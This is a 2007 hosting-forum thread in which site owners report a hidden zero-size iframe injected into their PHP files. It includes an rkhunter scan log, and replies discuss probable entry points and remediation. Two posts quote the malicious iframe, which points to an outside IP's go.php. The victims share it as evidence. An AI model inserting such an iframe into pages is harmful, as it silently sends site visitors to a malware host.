Results 1 to 6 of 6
  1. #1

    iframe injection problem and rkhunter warnings

    I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account.

    Code:
    <iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
    what is the reason and how to fix that ?


    and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem :
    rkhunter results:
    Code:
    Checking system commands...
    
      Performing 'strings' command checks
        Checking 'strings' command                               [ OK ]
    
      Performing 'shared libraries' checks
        Checking for preloading variables                        [ None found ]
        Checking for preload file                                [ Not found ]
        Checking LD_LIBRARY_PATH variable                        [ Not found ]
    
      Performing file properties checks
        Checking for prerequisites                               [ Warning ]
        /bin/awk                                                 [ OK ]
        /bin/basename                                      [ OK ]
        /bin/bash                                               [ OK ]
        /bin/cat                                                  [ OK ]
        /bin/chmod                                            [ OK ]
        /bin/chown                                               [ OK ]
        /bin/cp                                                  [ OK ]
        /bin/csh                                                 [ OK ]
        /bin/cut                                                 [ OK ]
        /bin/date                                                [ OK ]
        /bin/df                                                  [ OK ]
        /bin/dmesg                                               [ OK ]
        /bin/echo                                                [ OK ]
        /bin/ed                                                  [ OK ]
        /bin/egrep                                               [ OK ]
        /bin/env                                                 [ OK ]
        /bin/fgrep                                               [ OK ]
        /bin/grep                                                [ OK ]
        /bin/kill                                                [ OK ]
        /bin/login                                               [ OK ]
        /bin/ls                                                  [ OK ]
        /bin/mail                                                [ OK ]
        /bin/mktemp                                              [ OK ]
        /bin/more                                                [ OK ]
        /bin/mount                                               [ OK ]
        /bin/mv                                                  [ OK ]
        /bin/netstat                                             [ OK ]
        /bin/passwd                                              [ OK ]
        /bin/ps                                                  [ OK ]
        /bin/pwd                                                 [ OK ]
        /bin/rpm                                                 [ OK ]
        /bin/sed                                                 [ OK ]
        /bin/sh                                                  [ OK ]
        /bin/sort                                                [ OK ]
        /bin/su                                                  [ OK ]
        /bin/touch                                               [ OK ]
        /bin/uname                                               [ OK ]
        /bin/gawk                                                [ OK ]
        /bin/tcsh                                                [ OK ]
        /usr/bin/awk                                             [ OK ]
        /usr/bin/chattr                                          [ OK ]
        /usr/bin/curl                                            [ OK ]
        /usr/bin/cut                                             [ OK ]
        /usr/bin/diff                                            [ OK ]
        /usr/bin/dirname                                         [ OK ]
        /usr/bin/du                                              [ OK ]
        /usr/bin/env                                             [ OK ]
        /usr/bin/file                                            [ OK ]
        /usr/bin/find                                            [ OK ]
         /usr/bin/GET                                             [ Warning ]
        /usr/bin/groups                                          [ Warning ]
        /usr/bin/head                                            [ OK ]
        /usr/bin/id                                              [ OK ]
        /usr/bin/kill                                            [ OK ]
        /usr/bin/killall                                         [ OK ]
        /usr/bin/last                                            [ OK ]
        /usr/bin/lastlog                                         [ OK ]
         /usr/bin/ldd                                             [ Warning ]
        /usr/bin/less                                            [ OK ]
        /usr/bin/locate                                          [ OK ]
        /usr/bin/logger                                          [ OK ]
        /usr/bin/lsattr                                          [ OK ]
        /usr/bin/lynx                                            [ OK ]
        /usr/bin/md5sum                                          [ OK ]
        /usr/bin/newgrp                                          [ OK ]
        /usr/bin/passwd                                          [ OK ]
        /usr/bin/perl                                            [ OK ]
        /usr/bin/pstree                                          [ OK ]
        /usr/bin/readlink                                        [ OK ]
        /usr/bin/runcon                                          [ OK ]
        /usr/bin/sha1sum                                         [ OK ]
        /usr/bin/size                                            [ OK ]
        /usr/bin/slocate                                         [ OK ]
        /usr/bin/stat                                            [ OK ]
        /usr/bin/strace                                          [ OK ]
        /usr/bin/strings                                         [ OK ]
        /usr/bin/sudo                                            [ OK ]
        /usr/bin/tail                                            [ OK ]
        /usr/bin/test                                            [ OK ]
        /usr/bin/top                                             [ OK ]
        /usr/bin/tr                                              [ OK ]
        /usr/bin/uniq                                            [ OK ]
        /usr/bin/users                                           [ OK ]
        /usr/bin/vmstat                                          [ OK ]
        /usr/bin/w                                               [ OK ]
        /usr/bin/watch                                           [ OK ]
        /usr/bin/wc                                              [ OK ]
        /usr/bin/wget                                            [ OK ]
         /usr/bin/whatis                                          [ Warning ]
        /usr/bin/whereis                                         [ OK ]
        /usr/bin/which                                           [ OK ]
        /usr/bin/who                                             [ OK ]
        /usr/bin/whoami                                          [ OK ]
        /usr/bin/gawk                                            [ OK ]
        /sbin/chkconfig                                          [ OK ]
        /sbin/depmod                                             [ OK ]
        /sbin/ifconfig                                           [ OK ]
        /sbin/ifdown                                             [ Warning ]
         /sbin/ifup                                                  [ Warning ]
        /sbin/init                                               [ OK ]
        /sbin/insmod                                             [ OK ]
        /sbin/ip                                                 [ OK ]
        /sbin/lsmod                                              [ OK ]
        /sbin/modinfo                                            [ OK ]
        /sbin/modprobe                                           [ OK ]
        /sbin/nologin                                            [ OK ]
        /sbin/rmmod                                              [ OK ]
        /sbin/runlevel                                           [ OK ]
        /sbin/sulogin                                            [ OK ]
        /sbin/sysctl                                             [ OK ]
        /sbin/syslogd                                            [ OK ]
        /usr/sbin/adduser                                        [ OK ]
        /usr/sbin/chroot                                         [ OK ]
        /usr/sbin/groupadd                                       [ OK ]
        /usr/sbin/groupdel                                       [ OK ]
        /usr/sbin/groupmod                                       [ OK ]
        /usr/sbin/grpck                                          [ OK ]
        /usr/sbin/kudzu                                          [ OK ]
        /usr/sbin/lsof                                           [ OK ]
        /usr/sbin/prelink                                        [ OK ]
        /usr/sbin/pwck                                           [ OK ]
        /usr/sbin/tcpd                                           [ OK ]
        /usr/sbin/useradd                                        [ OK ]
        /usr/sbin/userdel                                        [ OK ]
        /usr/sbin/usermod                                        [ OK ]
        /usr/sbin/vipw                                           [ OK ]
        /usr/sbin/xinetd                                         [ OK ]
        /usr/local/bin/perl                                      [ OK ]
        /usr/local/bin/rkhunter                                  [ OK ]
    
    
    Checking for rootkits...
    
      Performing check of known rootkit files and directories
        55808 Trojan - Variant A                                 [ Not found ]
        ADM Worm                                                 [ Not found ]
        AjaKit Rootkit                                           [ Not found ]
        aPa Kit                                                  [ Not found ]
        Apache Worm                                              [ Not found ]
        Ambient (ark) Rootkit                                    [ Not found ]
        Balaur Rootkit                                           [ Not found ]
        BeastKit Rootkit                                         [ Not found ]
        beX2 Rootkit                                             [ Not found ]
        BOBKit Rootkit                                           [ Not found ]
        CiNIK Worm (Slapper.B variant)                           [ Not found ]
        Danny-Boy's Abuse Kit                                    [ Not found ]
        Devil RootKit                                            [ Not found ]
        Dica-Kit Rootkit                                         [ Not found ]
        Dreams Rootkit                                           [ Not found ]
        Duarawkz Rootkit                                         [ Not found ]
        Enye LKM                                                 [ Not found ]
        Flea Linux Rootkit                                       [ Not found ]
        FreeBSD Rootkit                                          [ Not found ]
        ****`it Rootkit                                          [ Not found ]
        GasKit Rootkit                                           [ Not found ]
        Heroin LKM                                               [ Not found ]
        HjC Kit                                                  [ Not found ]
        ignoKit Rootkit                                          [ Not found ]
        ImperalsS-FBRK Rootkit                                   [ Not found ]
        Irix Rootkit                                             [ Not found ]
        Kitko Rootkit                                            [ Not found ]
        Knark Rootkit                                            [ Not found ]
        Li0n Worm                                                [ Not found ]
        Lockit / LJK2 Rootkit                                    [ Not found ]
        Mood-NT Rootkit                                          [ Not found ]
        MRK Rootkit                                              [ Not found ]
        Ni0 Rootkit                                              [ Not found ]
        Ohhara Rootkit                                           [ Not found ]
        Optic Kit (Tux) Worm                                     [ Not found ]
        Oz Rootkit                                               [ Not found ]
        Phalanx Rootkit                                          [ Not found ]
        Phalanx Rootkit (strings)                                [ Not found ]
        Portacelo Rootkit                                        [ Not found ]
        R3dstorm Toolkit                                         [ Not found ]
        RH-Sharpe's Rootkit                                      [ Not found ]
        RSHA's Rootkit                                           [ Not found ]
        Scalper Worm                                             [ Not found ]
        Sebek LKM                                                [ Not found ]
        Shutdown Rootkit                                         [ Not found ]
        SHV4 Rootkit                                             [ Not found ]
        SHV5 Rootkit                                             [ Not found ]
        Sin Rootkit                                              [ Not found ]
        Slapper Worm                                             [ Not found ]
        Sneakin Rootkit                                          [ Not found ]
        Suckit Rootkit                                           [ Not found ]
        SunOS Rootkit                                            [ Not found ]
        SunOS / NSDAP Rootkit                                    [ Not found ]
        Superkit Rootkit                                         [ Not found ]
        TBD (Telnet BackDoor)                                    [ Not found ]
        TeLeKiT Rootkit                                          [ Not found ]
        T0rn Rootkit                                             [ Not found ]
        Trojanit Kit                                             [ Not found ]
        Tuxtendo Rootkit                                         [ Not found ]
        URK Rootkit                                              [ Not found ]
        VcKit Rootkit                                            [ Not found ]
        Volc Rootkit                                             [ Not found ]
        X-Org SunOS Rootkit                                      [ Not found ]
        zaRwT.KiT Rootkit                                        [ Not found ]
    
      Performing additional rootkit checks
        Suckit Rookit additional checks                          [ OK ]
        Checking for possible rootkit files and directories      [ None found ]
        Checking for possible rootkit strings                    [ None found ]
    
      Performing malware checks
        Checking running processes for suspicious files          [ None found ]
        Checking for login backdoors                             [ None found ]
        Checking for suspicious directories                      [ None found ]
        Checking for sniffer log files                           [ None found ]
    
      Performing trojan specific checks
        Checking for enabled xinetd services                     [ None found ]
        Checking for Apache backdoor                             [ Not found ]
    
      Performing Linux specific checks
        Checking kernel module commands                          [ OK ]
        Checking kernel module names                             [ OK ]
    Checking the network...
    
      Performing check for backdoor ports
        Checking for UDP port 2001                                [ Not found ]
        Checking for TCP port 2006                                [ Not found ]
        Checking for TCP port 2128                                [ Not found ]
        Checking for TCP port 14856                              [ Not found ]
        Checking for TCP port 47107                              [ Not found ]
        Checking for TCP port 60922                              [ Not found ]
    
      Performing checks on the network interfaces
        Checking for promiscuous interfaces                      [ None found ]
    
    Checking the local host...
    
      Performing system boot checks
        Checking for local host name                             [ Found ]
        Checking for local startup files                         [ Found ]
        Checking local startup files for malware                 [ None found ]
        Checking system startup files for malware                [ None found ]
    
      Performing group and account checks
        Checking for passwd file                                 [ Found ]
        Checking for root equivalent (UID 0) accounts            [ None found ]
        Checking for passwordless accounts                       [ None found ]
        Checking for passwd file changes                         [ None found ]
        Checking for group file changes                          [ None found ]
        Checking root account shell history files                [ OK ]
    
      Performing system configuration file checks
        Checking for SSH configuration file                      [ Found ]
         Checking if SSH root access is allowed                   [ Warning ]
         Checking if SSH protocol v1 is allowed                   [ Warning ]
        Checking for running syslog daemon                       [ Found ]
        Checking for syslog configuration file                   [ Found ]
        Checking if syslog remote logging is allowed             [ Not allowed ]
    
      Performing filesystem checks
        Checking /dev for suspicious file types                  [ None found ]
        Checking for hidden files and directories                [ Warning ]
    Checking application versions...
    
        Checking version of Exim MTA                             [ OK ]
         Checking version of GnuPG                                [ Warning ]
        Checking version of Apache                               [ Skipped ]
        Checking version of Bind DNS                             [ OK ]
         Checking version of OpenSSL                              [ Warning ]
        Checking version of PHP                                  [ OK ]
        Checking version of Procmail MTA                         [ OK ]
        Checking version of OpenSSH                              [ OK ]
    
    
    System checks summary
    =====================
    
    File properties checks...
        Required commands check failed
        Files checked: 129
        Suspect files: 6
    
    Rootkit checks...
        Rootkits checked : 114
        Possible rootkits: 0
    
    Applications checks...
        Applications checked: 8
        Suspect applications: 2
    
    The system checks took: 3 minutes and 12 seconds
    
    All results have been written to the logfile (/var/log/rkhunter.log)
    
    One or more warnings have been found while checking the system.
    Please check the log file (/var/log/rkhunter.log)
    how can I fix all this problem please ????
    Last edited by xserverx; 08-25-2007 at 12:17 PM.

  2. #2
    Join Date
    Mar 2003
    Location
    Canada
    Posts
    9,072
    In regards to the iframe problem, have you verified this by viewing the files on your server OR via your internet browser?
    RACK911 Labs | Penetration Testing | https://www.RACK911Labs.ca

    www.HostingSecList.com - Security Notices for the Hosting Community.

  3. #3
    Quote Originally Posted by Pat H View Post
    In regards to the iframe problem, have you verified this by viewing the files on your server OR via your internet browser?

    I have most sites when I browser it from IE my AntiVirus make a sign of existence the virus
    in the page source I found iframes Injections

  4. #4
    can someone help me ??

  5. #5
    Join Date
    Jun 2006
    Location
    Israel
    Posts
    38
    I'm having the same problem on my sites. on the page buttom (right after the php ends with ?>) I have the following code:
    Code:
    <iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
    It was in my gallery index (photopost), vbulletin login page and index, site index, and news page (cutenews).
    Anything I can do to see how I got it?

    My server is a CentOS 4.3, with apache 1.337 and php 4.4.7.

    Thanks

  6. #6
    Join Date
    Aug 2007
    Posts
    57
    You probably either have weak passwords on an FTP account, or (more likely) you're running a web script/software that has a known vulnerability.

    For all the scripts you have on the server, check to make sure there's no known security holes with the installed version, and sign up to receive e-mail updates should a security update be released.

    Check the file modification times. The script or software that was first defaced is most likely the entry point, but not necessarily; it could be that it offered entry, but was not itself vulnerable to defacement.

    Based on the characteristics, I'd suspect an automated worm that's finding a common vulnerability (well-known software on your server), and appending the iframe code to any files it can find.

    FYI, "injection" isn't really the right term here, the files were modified, hence this is defacement. injection would suggest cross-site scripting attacks (which do not modify files on your server), or something like an SQL-based attack. Also, rkhunter is unlikely to find anything, as it's not checking for vulnerable versions of PHP scripts, etc.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •